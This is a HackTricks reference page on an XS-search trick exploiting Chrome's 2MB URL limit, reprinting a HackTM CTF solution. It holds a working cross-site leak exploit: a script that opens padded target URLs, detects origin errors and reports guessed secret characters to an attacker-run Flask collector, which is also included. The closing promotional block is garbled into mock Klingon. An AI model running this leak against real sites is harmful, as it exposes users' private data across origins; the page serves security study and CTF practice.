hacktricks/pentesting-web/xs-search/url-max-length-client-side.md

URL Max Length - Client Side

Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!

• Do you work in a cybersecurity company? Do you want to see your company advertised in HackTricks? or do you want to have access to the latest version of the PEASS or download HackTricks in PDF? Check the SUBSCRIPTION PLANS!
• Discover The PEASS Family, our collection of exclusive NFTs
• Get the official PEASS & HackTricks swag
• Join the 💬 Discord group or the telegram group or follow me on Twitter 🐦@carlospolopm.
• Share your hacking tricks by submitting PRs to the hacktricks repo and hacktricks-cloud repo.

Code from https://ctf.zeyu2001.com/2023/hacktm-ctf-qualifiers/secrets#unintended-solution-chromes-2mb-url-limit

<html>
<body></body>
<script>
(async () => {

const curr = "http://secrets.wtl.pw/search?query=HackTM{"

const leak = async (char) => {

fetch("/?try=" + char)
let w = window.open(curr + char +  "#" + "A".repeat(2 * 1024 * 1024 - curr.length - 2))

const check = async () => {
try {
w.origin
} catch {
fetch("/?nope=" + char)
return
}
setTimeout(check, 100)
}
check()
}

const CHARSET = "abcdefghijklmnopqrstuvwxyz-_0123456789"

for (let i = 0; i < CHARSET.length; i++) {
leak(CHARSET[i])
await new Promise(resolve => setTimeout(resolve, 50))
}
})()
</script>
</html>

Server side:

from flask import Flask, request

app = Flask(__name__)

CHARSET = "abcdefghijklmnopqrstuvwxyz-_0123456789"
chars = []

@app.route('/', methods=['GET'])
def index():
global chars

nope = request.args.get('nope', '')
if nope:
chars.append(nope)

remaining = [c for c in CHARSET if c not in chars]

print("Remaining: {}".format(remaining))

return "OK"

@app.route('/exploit.html', methods=['GET'])
def exploit():
return open('exploit.html', 'r').read()

if __name__ == '__main__':
app.run(host='0.0.0.0', port=1337)

qaStaHvIS AWS hacking vItlhutlh htARTE (HackTricks AWS Red Team Expert)!

• Do you work in a cybersecurity company? qaStaHvIS HackTricks DajatlhlaH company advertised vItlhutlh? pagh latest version of the PEASS or download HackTricks in PDF vItlhutlh? SUBSCRIPTION PLANS yIlo'!
• The PEASS Family yIlo', collection exclusive NFTs yIlo'
• official PEASS & HackTricks swag yIlo'
• Join the 💬 Discord group yIlo' telegram group yIlo' follow Twitter 🐦@carlospolopm.
• Share your hacking tricks by submitting PRs to the hacktricks repo hacktricks-cloud repo yIlo'.